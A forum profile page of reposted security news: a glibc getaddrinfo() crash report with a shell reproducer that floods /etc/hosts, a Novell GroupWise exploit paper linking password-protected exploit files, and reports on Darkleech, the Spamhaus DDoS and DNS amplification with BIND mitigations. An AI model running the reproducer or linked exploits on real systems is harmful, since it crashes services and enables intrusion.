Everything posted by Nytro

  1. [h=1]CVE-2012-1889: Security Update Analysis[/h] Published on 19.07.2012 CVE-2012-1889: Security Update Analysis by Brian Mariani & Frederic Bourla Since the 30th of May 2012, hackers have been abusing the Microsoft XML Core Services vulnerability. On the 10th of July 2012, Microsoft finally published a security advisory that fixes this issue. The present document and video explain the details of this fix. As a lab test we used a Windows XP workstation with Service Pack 3. The Internet Explorer version is 6.0. Demo video for publication: https://www.htbridge.com/publications...
  2. [h=1]Novell GroupWise Untrusted Pointer Dereference Exploitation[/h]April 3, 2013 [TABLE] [TR] [TD]Authors: [/TD] [TD]Brian Mariani, Senior Security Auditor, High-Tech Bridge Frederic Bourla, Chief Security Specialist, High-Tech Bridge[/TD] [/TR] [/TABLE] On the 24th of November 2012, High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Novell GroupWise 2012. On the 26th of November 2012, High-Tech Bridge Security Research Lab informed Novell about these vulnerabilities, which existed in two core ActiveX modules. On the 30th of January 2013, Novell published a Security Bulletin and released a security patch. Finally, on the 3rd of April 2013, High-Tech Bridge Security Research Lab disclosed the advisory details. This paper demonstrates how the vulnerability can be exploited to execute arbitrary code on a vulnerable system. PDF: Novell GroupWise Untrusted Pointer Dereference (1.0 MB) Video: Novell GroupWise Untrusted Pointer Dereference Exploitation Exploit files (Novell-GroupWise-exploit.rar) password: htbridge (5 kB) Source: https://www.htbridge.com/publications/novell_groupwise_untrusted_pointer_dereference_exploitation.html
  3. Keep Your Eye On The Bitcoin 10:25 am (UTC-7) | by Ben April (Senior Threat Researcher) The market capitalization of the Bitcoin ecosystem crossed 1 billion US dollars recently. As the value of each Bitcoin nears 100 US dollars, many have begun to take notice. One likely source of this sudden interest is the Cypriot banking crisis. As depositors scramble to hedge their investments, the steadily growing notoriety of Bitcoin raises some interesting opportunities. The two most alluring aspects that make the Bitcoin economy unique are the concept of mining and, interestingly enough, the automatic limits on mining. Unlike other forms of currency, Bitcoin users can create new money. By solving complex math problems, users (or miners, as they are often called) create new bitcoins where there used to be none. This operation is not strictly free "as in beer": miners need to invest time, electricity, and equipment in the endeavor. Profit is also not guaranteed. The nature of the math problems being solved means that a single miner may never create new bitcoins on their own. This self-limiting aspect of Bitcoin creates a fascinating set of contradictions. First, there is a hard limit: there will never be more than 21 million bitcoins in circulation. It is important to note that each bitcoin can be divided almost ad infinitum. Some software only supports fractional bitcoins to 8 decimal places, but there is no hard limit in the Bitcoin system itself. Once all bitcoins have been mined, it is expected that the value will increase as smaller and smaller fractions are transacted. Block mining serves two functions. First, it cements a set of bitcoin transactions into the distributed record called the block chain. Second, the miner who solves the problem and successfully signs the block is rewarded. The reward today consists of 25 bitcoins plus any transaction fees.
Transaction fees are small quantities of bitcoins left over (intentionally, by the requestor) from any submitted transactions. The reward changed from 50 bitcoins to 25 towards the end of November 2012. Bitcoin is designed such that this halving of the reward should automatically occur approximately every 4 years, until 21 million bitcoins have been created and the reward becomes 0. At that point, transaction fees will become the only incentive for continued mining operations, which are essential for the continued success of Bitcoin. Its distributed, non-regulated nature has also raised the ire of regulators. The United States Treasury Department's Financial Crimes Enforcement Network announced on March 13 new guidelines on how to apply existing regulations to people involved in the transacting of virtual currencies. This announcement was aimed at the prevention of money laundering via Bitcoin; at the same time, some saw it as adding legitimacy to the growing Bitcoin economy. One last attribute of Bitcoin that I will mention in this post is called "difficulty". This is adjusted automatically based on the overall speed of mining: if blocks are being mined at a rate faster than expected (due to an excess of mining capacity), the difficulty level increases. This is intended to prevent one actor from applying excessive capacity in hopes of gaining an unfair advantage. Judging by the current up-swing in difficulty, I think it is safe to say that the popularity of Bitcoin is on the rise. No one can say for sure what is on the horizon for Bitcoin. However, I think it is safe to say there will be more to see soon. Source: Keep Your Eye On The Bitcoin | Security Intelligence Blog | Trend Micro
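The reward schedule described above (50 bitcoins, then 25, halving roughly every 4 years until the total approaches 21 million) can be sketched in a few lines. This is an illustration using the well-known protocol constants (a halving every 210,000 blocks, rewards counted in 10^-8 BTC units), not an excerpt from any Bitcoin implementation.

```python
# Sketch of the Bitcoin block-reward halving schedule described above.
# Assumed constants: 210,000 blocks per halving (~4 years) and an
# initial reward of 50 BTC, tracked in 1e-8 BTC units.
HALVING_INTERVAL = 210_000
INITIAL_REWARD = 50 * 10**8  # in 1e-8 BTC units

def block_reward(height):
    """Reward for the block at the given height, in 1e-8 BTC units."""
    halvings = height // HALVING_INTERVAL
    if halvings >= 64:  # shifting further would be meaningless
        return 0
    return INITIAL_REWARD >> halvings  # integer halving each interval

def total_supply():
    """Sum of all rewards ever paid, in BTC: approaches 21 million."""
    supply, height = 0, 0
    while block_reward(height) > 0:
        supply += block_reward(height) * HALVING_INTERVAL
        height += HALVING_INTERVAL
    return supply / 10**8

print(block_reward(0) / 10**8)        # 50.0 before the first halving
print(block_reward(210_000) / 10**8)  # 25.0 after the November 2012 halving
print(total_supply())                 # just under 21 million
```

Because the reward is halved as an integer, the sum of all rewards converges just below 21 million rather than hitting it exactly.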
  4. Malshare

    You can tell from the title: http://malshare.com/daily/
  5. glibc getaddrinfo() stack overflow From: Marcus Meissner <meissner () suse de> Date: Wed, 3 Apr 2013 13:10:21 +0200 Hi, A customer reported a glibc crash, which turned out to be a stack overflow in getaddrinfo(). getaddrinfo() uses: struct sort_result results[nresults]; with nresults controlled by the nameservice chain (DNS or /etc/hosts). This will be visible mostly on threaded applications with smaller stack sizes, or operating near out of stack. Reproducer I tried: $ for i in `seq 1 10000000`; do echo "ff00::$i a1" >>/etc/hosts; done $ ulimit -s 1024 $ telnet a1 Segmentation fault (clean out /etc/hosts again) I am not sure you can usually push this amount of addresses via DNS for all setups. Andreas is currently pushing the patch to glibc GIT. Reference: https://bugzilla.novell.com/show_bug.cgi?id=813121 Ciao, Marcus Source: oss-sec: CVE Request: glibc getaddrinfo() stack overflow
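A back-of-envelope calculation shows why the reproducer above crashes: the variable-length array `results[nresults]` grows linearly with the number of matching /etc/hosts entries, so 10 million entries dwarf a 1 MiB stack. The per-entry size below is an assumption for illustration, not glibc's exact struct layout.

```python
# Why the getaddrinfo() reproducer crashes: stack use scales with the
# number of matching hosts entries. SORT_RESULT_SIZE is an assumed
# per-entry size, not the real sizeof(struct sort_result).
SORT_RESULT_SIZE = 64          # assumed bytes per sort_result entry
NRESULTS = 10_000_000          # entries written by the reproducer loop
STACK_LIMIT = 1024 * 1024      # `ulimit -s 1024` => 1 MiB of stack

needed = SORT_RESULT_SIZE * NRESULTS
print(needed // (1024 * 1024), "MiB needed vs",
      STACK_LIMIT // (1024 * 1024), "MiB available")
```

Even with a much smaller struct, any unbounded attacker-controlled count makes a stack VLA overflowable, which is why the fix moves the allocation off the stack.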
  6. [h=1]Ongoing malware attack targeting Apache hijacks 20,000 sites[/h][h=2]Mysterious "Darkleech" exposes visitors to potent malware exploits.[/h] by Dan Goodin - Apr 2 2013, 6:15pm Tens of thousands of websites, some operated by The Los Angeles Times, Seagate, and other reputable companies, have recently come under the spell of "Darkleech," a mysterious exploitation toolkit that exposes visitors to potent malware attacks. The ongoing attacks, estimated to have infected 20,000 websites in the past few weeks alone, are significant because of their success in targeting Apache, by far the Internet's most popular Web server software. Once it takes hold, Darkleech injects invisible code into webpages, which in turn surreptitiously opens a connection that exposes visitors to malicious third-party websites, researchers said. Although the attacks have been active since at least August, no one has been able to positively identify the weakness attackers are using to commandeer the Apache-based machines. Vulnerabilities in Plesk, cPanel, or other software used to administer websites are one possibility, but researchers aren't ruling out password cracking, social engineering, or attacks that exploit unknown bugs in frequently used applications and OSes. Researchers also don't know precisely how many sites have been infected by Darkleech. The server malware employs a sophisticated array of conditions to determine when to inject malicious links into the webpages shown to end users. Visitors using IP addresses belonging to security and hosting firms are passed over, as are people who have recently been attacked or who don't access the pages from specific search queries. The ability of Darkleech to inject unique links on the fly is also hindering research into the elusive infection toolkit.
"Given that these are dynamically generated, there would be no viable means to do a search to ferret them out on Google, etc.," Mary Landesman, a senior security researcher for Cisco Systems' TRAC team, told Ars. "Unfortunately, the nature of the compromise coupled with the sophisticated conditional criteria presents several challenges." The injected HTML iframe tag is usually constructed as IP address/hex/q.php. Sites that deliver such iframes that aren't visible within the HTML source are likely compromised by Darkleech. Special "regular expression" searches helped Landesman ferret out reported iframes used in these attacks. Note that while the iframe reference is formed as IP/hex/q.php, the malware delivery is formed as IP/hex/hex/q.php. [h=2]In active development[/h] With the help of Cisco Security Engineer Gregg Conklin, Landesman observed Darkleech infections on almost 2,000 Web host servers during the month of February and the first two weeks of March. The servers were located in 48 countries, with the highest concentrations in the US, UK, and Germany. Assuming the typical Web server involved hosted an average of 10 sites, as many as 20,000 sites may have been infected over that period. The attacks were documented as early as August on researcher Denis Sinegubko's Unmask Parasites blog. They were observed infecting the LA Times website in February and the blog of hard drive manufacturer Seagate last month, an indication the attacks are ongoing. Landesman said the Seagate infection affected media.seagate.com, which was hosted by Media Temple, began no later than February 12, and was active through March 18. Representatives for both Seagate and the LA Times said the sites were disinfected once the compromises came to light. "I regularly receive e-mails and comments to my blog posts about new cases," Sinegubko told Ars last week.
"Sometimes it's a shared server with hundreds or thousands of sites on it. Sometimes it's a dedicated server with some heavy-traffic site." Referring to the rogue Apache modules that are injected into infected sites, he added, "Since late 2012 people have sent me new versions of the malicious modules, so this malware is in active development, which means that it pays off well and the number of infected servers can be high (especially given the selectivity of the malware that prefers to stay under the radar rather than infecting every single visitor)." Landesman picked a random sample of 1,239 compromised websites and found all were running Apache version 2.2.22 or higher, mostly on a variety of Linux distributions. According to recent blog posts published here and here by researchers from security firm Sucuri, Darkleech uses rogue Apache modules to inject malicious payloads into the webpages of the sites it infects and to maintain control of compromised systems. Disinfecting Web servers can prove extremely difficult since the malware takes control of the secure shell (SSH) mechanism that legitimate administrators use to make technical changes and update a site's content. "We have noticed that they are modifying all SSH binaries and inserting a version that gives them full access back to the server," Sucuri CTO Daniel Cid wrote in January. "The modifications not only allow them to remote into the server bypassing existing authentication controls, but also allow them to steal all SSH authentications and push it to their remote servers." Researchers from a variety of other organizations, including antivirus provider Sophos and the Malware Must Die blog, have also stumbled on servers infected by Darkleech. They note the third-party attack sites host malicious code from the Blackhole exploit kit, a suite of tools that targets vulnerabilities in Oracle's Java, Adobe's Flash and Reader, and a variety of other popular client software.
"It looks like the attackers were beforehand well-prepared with some penetration method to gain web exploitation which were used to gain shell access and did the privilege escalation unto root," the writer of the latter blog post wrote last week, adding that he wasn't at liberty to discuss the precise method. "Since the root [was] gained in all infected servers, there is no way we can trust the host or its credentials anymore." The writer went on to recommend that admins take infected servers offline and use backup data to reinstall the software. He also suggested that users take care to change all server credentials, since there's a strong chance all previous administrator logins have been compromised. [h=2]Déjà vu[/h] The Apache server compromise in many ways resembles a mass infection from 2008 that also used tens of thousands of sites to silently expose visitors to malware attacks. The challenge white hats often face in fighting these hacks is that each researcher sees only a small part of the overall damage. Because the server malware is designed to conceal itself and because so many individual systems are affected, it can be next to impossible for any one person to gain a true appreciation for the scope of the attack. Since there's not yet consensus among researchers about exactly how Darkleech takes hold of infected systems, it's still unclear exactly how to protect them. And as already noted, disinfecting systems can also prove challenging since backdoor and possibly even rootkit functionality may allow attackers to maintain control of servers even after the malicious modules are uninstalled. Landesman has published her own blog post about the infection here. "This is a latent infection," Sinegubko wrote. "It hides from server and site admins using blacklists and IPs and low-level server APIs (something that normal site scripts don't have access to). "It hides from returning visitors.
It constantly changes domains so you can't reduce it to the facts where some particular domain was involved. I'm still waiting for someone to share any reliable information about the attack vector." Source: http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-attack-targeting-apache-hijacks-20000-sites/
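The iframe URL shape described in the article (IP address, one hex path component for the reference or two for the malware delivery, then q.php) can be expressed as a regular expression. This is a rough heuristic sketched from the pattern the article reports, not a published detection signature; the hex component lengths vary in the wild.

```python
# Rough matcher for the Darkleech iframe URL shape reported above:
# IP/hex/q.php (iframe reference) or IP/hex/hex/q.php (malware
# delivery). Heuristic only; hex lengths vary, so expect false hits.
import re

DARKLEECH_RE = re.compile(
    r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:/[0-9a-f]+){1,2}/q\.php$",
    re.IGNORECASE,
)

print(bool(DARKLEECH_RE.match("http://203.0.113.5/0f1e2d3c/q.php")))
print(bool(DARKLEECH_RE.match("http://203.0.113.5/0f1e/2d3c/q.php")))
print(bool(DARKLEECH_RE.match("http://example.com/page/q.php")))
```

As the article notes, the links are generated dynamically and served conditionally, so pattern matching on logged URLs is useful for triage but cannot prove a server clean.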
  7. Please put the encrypted password on Pastebin and send me the link; I edited the first post myself and the password is no longer correct.
  8. [h=1]When spammers go to war: Behind the Spamhaus DDoS[/h][h=2]The story behind the 300Gb/s attack on an anti-spam organization.[/h] by Peter Bright - Mar 28 2013, 7:30pm Over the last ten days, a series of massive denial-of-service attacks has been aimed at Spamhaus, a not-for-profit organization that describes its purpose as "track[ing] the Internet's spam operations and sources, to provide dependable realtime anti-spam protection for Internet networks." These attacks have grown so large—up to 300Gb/s—that the volume of traffic is threatening to bring down core Internet infrastructure. The New York Times reported recently that the attacks came from a Dutch hosting company called CyberBunker (also known as cb3rob), which owns and operates a real military bunker and which has been targeted in the past by Spamhaus. The spokesman whom the NYT interviewed, Sven Olaf Kamphuis, has since posted on his Facebook page that CyberBunker is not orchestrating the attacks. Kamphuis also claimed that the NYT was plumping for sensationalism over accuracy. Sven Olaf Kamphuis is, however, affiliated with the newly organized group "STOPhaus." STOPhaus claims that Spamhaus is "an offshore criminal network of tax circumventing self declared internet terrorists pretending to be 'spam' fighters" that is "attempt[ing] to control the internet through underhanded extortion tactics." STOPhaus claims to have the support of "half the Russian and Chinese Internet industry." It wants nothing less than to put Spamhaus out of action, and it looks like it's not too picky about how that might be accomplished. And if Spamhaus won't back down, Kamphuis has made clear that even more data can be thrown at the anti-spammers. [h=2]Escalation[/h] Hating Spamhaus has a long history. Spamhaus is a nonprofit organization based in London and Geneva that was started in 1998 as a way of combating the escalating spam problem.
The group doesn't block any data itself, but it does operate a number of blacklist services used by others to block data. The first of these was the Spamhaus Block List (SBL), a database of IP addresses known to be spam originators. E-mail servers can query the SBL for each incoming e-mail to see if the connection is being made from an IP address in the database. If it is, they can reject the connection as being a probable source of spam. SBL tended to be filled with machines that were, for one reason or another, operating as open relays. The protocol used for sending e-mail, SMTP (Simple Mail Transfer Protocol), has a feature that nowadays might be considered rather undesirable: in principle, any SMTP server can be used to send e-mail from any sender to any recipient. If the SMTP server isn't responsible for the message box that a mail is being sent to, it should look up the server that is responsible for the message box and forward the message on to that server, a process called "relaying," and servers that operate in this way are "open" relays. This is great for spammers. They can use a bogus address for the sender and the victim's address for the recipient, then use any open relay to actually send that message. The open relay will then find the real recipient server and forward the message. This is obviously undesirable, so most SMTP servers these days apply additional rules. For example, ISP-operated mail servers will often operate as relays, but with some restrictions: they'll only allow relaying if the connection is being made from an IP address that belongs to the ISP. Or they will require a username and password for access. As awareness of the problem of open relays has grown and the number of useful open relays has dropped, spammers have moved to other approaches. Instead of sending mail through a relay, they more commonly send it from machines they control directly to the recipient's mail server.
One way they do this is with compromised PCs organized in botnets. The command and control servers direct the PCs in the botnets to send spam, and so the spam originates from hundreds of thousands or millions of compromised home and office PCs. This is why the destruction of large botnets often results in a drop in the number of spam messages sent. To counter this kind of thing, some blacklist operators maintain blacklists of "client" IP addresses, addresses used by consumer-focused ISPs that, for the most part, shouldn't be directly sending mail at all (instead, they should be routing mail through their ISPs' respective mail relays). Spamhaus operates such a list, separate from the SBL, calling it the Policy Block List. Spamhaus also has a database of compromised machines, the Exploits Block List, that lists hijacked machines running spam-related malware. Spamhaus has a number of criteria that can result in an IP address being listed in its database. The organization has a number of spamtrap e-mail addresses: addresses that will never receive legitimate mail (because nobody actually uses them). This is the most obvious source of IP addresses, and probably the least controversial—if an IP address sends spam to an inbox, it's fair game to regard that IP address as a spam source. Spamhaus also blocks "spam operations," which is to say companies it believes make a business of sending spam. It lists these in its Register of Known Spam Operations (ROKSO), and it will pre-emptively blacklist IP addresses used by these groups. (Spamhaus will blacklist "spam support services"—ISPs and other service operators known to be spam friendly, for example by offering Web hosting to spammers, hosting spam servers, or selling spam software.) The organization's most severe measure is its DROP ("don't route or peer") list. The DROP list is a list of IP address blocks that are controlled by criminals and spammers. Routers can use these to block all traffic from these IP ranges.
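The DNS-based lists described above (SBL, Policy Block List, Exploits Block List) are all consulted the same way: a mail server reverses the octets of the connecting IP address and looks that name up under the list's zone; an answer means the address is listed, NXDOMAIN means it is not. A minimal sketch of the query-name construction, using Spamhaus's combined "zen" zone as the example:

```python
# Sketch of how a mail server consults a DNS blacklist: reverse the
# connecting IP's octets and query them under the list's zone. An A
# answer (conventionally in 127.0.0.0/8) means the IP is listed.
def dnsbl_query_name(ip, zone="zen.spamhaus.org"):
    """Build the DNSBL lookup name for an IPv4 address."""
    octets = ip.split(".")
    return ".".join(reversed(octets)) + "." + zone

# 127.0.0.2 is the conventional test address that DNSBLs always list.
print(dnsbl_query_name("127.0.0.2"))  # 2.0.0.127.zen.spamhaus.org
```

A real mail server would then resolve this name with an ordinary DNS lookup and reject or greylist the connection if an answer comes back.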
Rather than using DNS, this list is distributed as a text file, for manual configuration, and using the BGP protocol, for routers to use directly. In addition to the lists it maintains and the different inclusion criteria, Spamhaus has one particularly important policy: escalation. Repeated infringement—such as an ISP that refuses to terminate the service of spammers on its network—will see Spamhaus move beyond blacklisting individual IP addresses and start blacklisting ranges. If behavior still isn't improved, Spamhaus will block ever-larger ranges. All of these policies, predictably, have caused conflict. [h=2]Going to war[/h] Though Spamhaus does no blocking itself, groups that depend on spam tend to blame the company for their losses. This has resulted in court proceedings against the organization. In the US, now-defunct online marketing site e360insight sued Spamhaus after it was included on the ROKSO list, claiming that it had lost millions of dollars as a result of Spamhaus's decision. Being a UK-based company, Spamhaus initially ignored the lawsuit in the US, resulting in a default judgment against it, in which e360 was awarded almost $12 million in 2007. After US courts threatened to have Spamhaus's domain name suspended, the group decided at this point to get involved in the court case. Though the default judgment stood—if you don't show up at a civil case that's the risk you run—the $12 million judgment was overturned by the Seventh Circuit Court of Appeals. The case was bounced back to a lower court to decide on a new damages award. The second time around, the court decided on damages of $27,002. Both sides appealed again. In 2011 the Seventh Circuit Court of Appeals issued its second judgment on the issue. e360 was awarded damages of $3 after the court decided that e360 had failed to demonstrate the material impact of Spamhaus's decision and had instead wasted time and called a witness that "painted a wildly unrealistic picture" of e360's losses.
To add insult to injury, the court ordered e360 to pay Spamhaus's costs. In every practical sense, this was a victory for Spamhaus and a loss for e360, though it didn't much matter by this point; e360 went out of business in 2008 or 2009 after engaging in numerous lawsuits against Internet users who had called it a spammer, and against Comcast for blocking e360's spam. It lost all these cases. Obviously, those who make money from spamming will have a grievance with Spamhaus. But they're not the only ones, thanks in no small part to Spamhaus' escalation policy. Network providers and domain registries also fall foul of its policies from time to time. In 2007, for instance, Spamhaus asked Austrian domain registry nic.at to suspend some domains, claiming that they were registered improperly and were being used to host phishing sites. Nic.at refused, saying that it would be against Austrian law to do so. The registrar asked Spamhaus to show that the registration information on the sites was incorrect. Spamhaus responded by putting nic.at's mail server in its blacklist under the "spam support services" category, arguing that nic.at let spammers keep using their domains. Ultimately, the domains were removed and nic.at was delisted. These kinds of conflicts eventually led to a fight between Spamhaus and CyberBunker. Spamhaus regards CyberBunker—which has a policy of hosting any kind of content so long as it is not "child porn and anything related to terrorism"—as a spam support service. Spamhaus says that CyberBunker was at one point hosting Chinese sites selling spamvertised knock-off watches. CyberBunker says that this has never been proven, and it dismissed the complaints as "childish claims." Spamhaus went upstream. CyberBunker bought its bandwidth from a company called DataHouse, which in turn bought bandwidth from Dutch service provider A2B Internet. In June 2011, Spamhaus asked A2B to cut off CyberBunker's network. 
A2B didn't, so in October 2011, Spamhaus added a range of 2,048 A2B-owned addresses to its blacklist. E-mail correspondence between Spamhaus and A2B, published by A2B, eventually acknowledged that CyberBunker/cb3rob was hosting a spamvertised site. Shortly after this acknowledgement was made, A2B ceased routing for CyberBunker; five hours later Spamhaus removed A2B from the blacklist. A2B subsequently filed a police complaint against Spamhaus, claiming that the group was engaged in "extortion" and was conducting "denial of e-mail service" attacks. [h=2]Stopping Spamhaus?[/h] The collective opposition to Spamhaus has now produced STOPhaus. This is not the first group organizing to stop Spamhaus, and it comes after previous efforts such as stopspamhaus.org. The group dismisses Spamhaus' claim to only operate lists and perform no blocking itself as false and misleading to the public, and it claims that Spamhaus "violates multiple terrorism laws." STOPhaus members consistently describe Spamhaus' activity as "blackmail" and further argue that the information listed in ROKSO is "slander" [sic] and in violation of the UK's Data Protection Act. They also say that if Spamhaus detects criminal activity, it has the "legal obligation" to report this to law enforcement rather than to list offending IP addresses and domains in its databases. Finally, they claim that the DROP list is a violation of the "UK Computer Sabotage Act" (though no such act exists in the UK). The style of the STOPhaus announcement is more than a little familiar to anyone who has followed Anonymous' various Internet activities. It mirrors the verbiage and slogans that have been a common feature of past Anonymous announcements. The Anonymous similarities don't stop there. The STOPhaus forum contains preliminary attempts to dox people associated with Spamhaus and with anti-spam activities in general.
(This includes Usenet group news.admin.net-abuse.email, where spam has been discussed since 1995, and Rob Pike, co-creator of the Plan 9 operating system and Google's Go programming language.) Besides claiming that Spamhaus is broadly criminal, STOPhaus asserts that Spamhaus threatens "net neutrality"; Spamhaus has such power that it can functionally deny people access to the Internet simply by listing them in its database. Despite all this alleged blocking, STOPhaus says that Spamhaus doesn't do one key thing: block spam. Not a single piece of it, apparently, not even as an accidental repercussion of the escalation policy. On March 19 of this year, STOPhaus supporters announced "Operation STOPhaus," demanding that Spamhaus cease listing any IP addresses other than those known to send spam to its own spamtraps, and that it compensate everyone whose non-spamming IP address was ever listed. Unsurprisingly, Spamhaus did not bow to the STOPhaus demands but instead complained to STOPhaus.com's hosting company, saying that the site was operated by a known spammer. Spamhaus was then attacked with a DDoS attack of apparently unprecedented scale. Kamphuis says that, although he is not personally conducting the attacks, the people who are could throw "quite a bit more" data at the anti-spam organization if needed. While this may disrupt the Internet for others, Kamphuis says that his group probably owns a third of the Internet, and as such they're "perfectly free" to break it if they want. If what Kamphuis says is true, Spamhaus can only expect the DDoS attacks to grow larger. [h=2]No end in sight[/h] Assuming that the attack really is backed by the large Russian and Chinese Internet companies that Kamphuis says are involved, there's no particular reason for it to end any time soon. In some ways similar to the open SMTP relays of the past, two pieces of poor configuration are facilitating the attacks.
Unlike open SMTP relays, these poor configurations are unlikely to go away any time soon. The specific issues are ISPs that allow forged traffic to leave their networks, a practice with little legitimate justification, and open DNS servers that can be used to generate large responses to small forged requests. Together, these allow attack systems that begin with a few gigabits of bandwidth to generate enormous floods of data through "amplification attacks" capable of knocking any conventionally hosted server off the 'Net. Even if a concerted effort were made to fix these systems, it would probably take months, if not years, to make a serious dent in the problem. As long as Spamhaus, its DDoS protection provider CloudFlare, and their respective connectivity providers are willing to tolerate the situation, they too don't really need to change anything. The Spamhaus blacklist is widely used, and it's widely used for one reason: contrary to STOPhaus's claims, it does, in fact, successfully block a lot of unwanted e-mail. There might be occasional collateral damage, but Spamhaus' users are clear: they're willing to take that risk if the alternative is more spam. Source: http://arstechnica.com/security/2013/03/when-spammers-go-to-war-behind-the-spamhaus-ddos/
  9. Alert TA13-088A: DNS Amplification Attacks From: US-CERT Alerts <technical-alerts () us-cert gov> Date: Fri, 29 Mar 2013 16:16:20 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System TA13-088A: DNS Amplification Attacks Original release date: March 29, 2013 Systems Affected * Domain Name System (DNS) servers Overview A Domain Name System (DNS) amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publicly accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. Description A Domain Name System (DNS) amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publicly accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. The basic attack technique consists of an attacker sending a DNS name lookup request to an open recursive DNS server with the source address spoofed to be the victim's address. When the DNS server sends the DNS record response, it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. By leveraging a botnet to perform additional spoofed DNS queries, an attacker can produce an overwhelming amount of traffic with little effort. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks. While the attacks are difficult to prevent, network operators can implement several possible mitigation strategies. The primary element in the attack that is the focus of an effective long-term solution is the detection and elimination of open recursive DNS resolvers.
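The amplification described above is just the ratio of response size to request size. The packet sizes below are illustrative assumptions (a small spoofed query against a large, record-heavy response), not figures from the advisory:

```python
# Illustrative amplification arithmetic for the attack described above.
# Both packet sizes are assumed example values, not measured figures.
QUERY_BYTES = 64        # small spoofed DNS query (assumed)
RESPONSE_BYTES = 3_000  # large response with many records (assumed)

amplification = RESPONSE_BYTES / QUERY_BYTES

# With this ratio, modest attacker bandwidth becomes a large flood
# aimed at the spoofed victim address.
attacker_bps = 2 * 10**9                 # 2 Gb/s of spoofed queries
victim_bps = attacker_bps * amplification

print(f"{amplification:.1f}x amplification")
print(f"{victim_bps / 10**9:.1f} Gb/s arriving at the victim")
```

The exact ratio varies with query type and the records a resolver returns, but the principle is the same: the attacker pays for the small queries while the victim receives the large responses.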
These systems are typically legitimate DNS servers that have been improperly configured to respond to recursive queries on behalf of any system, rather than restricting recursive responses only to requests from local or authorized clients. By identifying these systems, an organization or network operator can reduce the number of potential resources that the attacker can employ in an attack. Impact A misconfigured Domain Name System (DNS) server can be exploited to participate in a Distributed Denial of Service (DDoS) attack. Solution DETECTION Several organizations offer free, web-based scanning tools that will search a network for vulnerable open DNS resolvers. These tools will scan entire network ranges and list the address of any identified open resolvers. Open DNS Resolver Project http://openresolverproject.org The Open DNS Resolver Project has compiled a list of DNS servers that are known to serve as globally accessible open resolvers. The query interface allows network administrators to enter IP ranges in CIDR format [1]. The Measurement Factory http://dns.measurement-factory.com Like the Open DNS Resolver Project, the Measurement Factory maintains a list of Internet accessible DNS servers and allows administrators to search for open recursive resolvers [2]. In addition, the Measurement Factory offers a free tool to directly test an individual DNS resolver to determine if it allows open recursion. This will allow an administrator to determine if configuration changes are necessary and verify that configuration changes have been effective [3]. Finally, the site offers statistics showing the number of open resolvers detected on the various Autonomous System (AS) networks, sorted by the highest number found [4]. DNSInspect http://www.dnsinspect.com Another freely available, web-based tool for testing DNS resolvers is DNSInspect. 
This site is similar to the Measurement Factory's ability to test a specific resolver for vulnerability, but offers the ability to test an entire DNS zone for several other potential configuration and security issues [5].

Indicators
In a typical recursive DNS query, a client sends a query request to a local DNS server requesting the resolution of a name or the reverse resolution of an IP address. The DNS server performs the necessary queries on behalf of the client and returns a response packet with the requested information or an error [6, page 21]. The specification does not allow for unsolicited responses. In a DNS amplification attack, the key indicator is a query response without a matching request.

MITIGATION
Unfortunately, due to the overwhelming traffic volume that can be produced by one of these attacks, there is often little that the victim can do to counter a large-scale DNS amplification-based distributed denial-of-service attack. While the only effective means of eliminating this type of attack is to eliminate open recursive resolvers, this requires a large-scale effort by numerous parties. According to the Open DNS Resolver Project, of the 27 million known DNS resolvers on the Internet, approximately 25 million pose a significant threat of being used in an attack [1]. However, several possible techniques are available to reduce the overall effectiveness of such attacks to the Internet community as a whole. Where possible, configuration links have been provided to assist administrators with making the recommended changes. The configuration information has been limited to BIND9 and Microsoft's DNS Server, which are two widely deployed DNS servers. If you are running a different DNS server, please see your vendor's documentation for configuration details.
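The indicator described above — a DNS response that arrives without a matching outstanding query — can be checked mechanically. Below is a minimal, hypothetical Python sketch (not part of the advisory; the record layout and function name are illustrative) that matches responses against previously seen queries by (client, server, transaction ID) and flags the unsolicited ones:

```python
def find_unsolicited(packets):
    """Flag DNS responses that arrive without a matching outstanding query.

    `packets` is a chronological list of dicts with keys:
      client, server, txid, is_response
    (a simplified stand-in for fields parsed from real DNS traffic).
    """
    outstanding = set()
    unsolicited = []
    for p in packets:
        key = (p["client"], p["server"], p["txid"])
        if not p["is_response"]:
            outstanding.add(key)       # query seen; a response is expected
        elif key in outstanding:
            outstanding.discard(key)   # legitimate answer to an earlier query
        else:
            unsolicited.append(p)      # response with no matching request
    return unsolicited
```

On the victim side of an amplification attack, a capture would consist almost entirely of such unmatched responses.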
Source IP Verification
Because the DNS queries being sent by the attacker-controlled clients must have a source address spoofed to appear as the victim's system, the first step to reducing the effectiveness of DNS amplification is for Internet Service Providers to deny any DNS traffic with spoofed addresses. The Network Working Group of the Internet Engineering Task Force released a Best Current Practice document in May 2000 that describes how an Internet Service Provider can filter network traffic on its network to drop packets with source addresses not reachable via the actual packet's path [7]. This configuration change would considerably reduce the potential for most current types of DDoS attacks.

Disabling Recursion on Authoritative Name Servers
Many of the DNS servers currently deployed on the Internet are exclusively intended to provide name resolution for a single domain. These systems do not need to support resolution of other domains on behalf of a client, and therefore should be configured with recursion disabled.

BIND9
Add the following to the global options [8]:

    options {
        allow-query-cache { none; };
        recursion no;
    };

Microsoft DNS Server
In the Microsoft DNS console tool [9]:
* Right-click the DNS server and click Properties.
* Click the Advanced tab.
* In Server options, select the "Disable recursion" check box, and then click OK.

Limiting Recursion to Authorized Clients
For DNS servers that are deployed within an organization or ISP to support name queries on behalf of a client, the resolver should be configured to only allow queries on behalf of authorized clients. These requests should typically only come from clients within the organization's network address range.
BIND9
In the global options, add the following [10]:

    acl corpnets { 192.168.1.0/24; 192.168.2.0/24; };
    options {
        allow-query { corpnets; };
        allow-recursion { corpnets; };
    };

Microsoft DNS Server
It is not currently possible to restrict recursive DNS requests to a specific client address range in Microsoft DNS Server. The most effective means of approximating this functionality is to configure the internal DNS server to forward queries to an external DNS server, and to use the firewall to restrict port 53 UDP traffic to the internal server and the external forwarder [11].

Rate Limiting Response of Recursive Name Servers
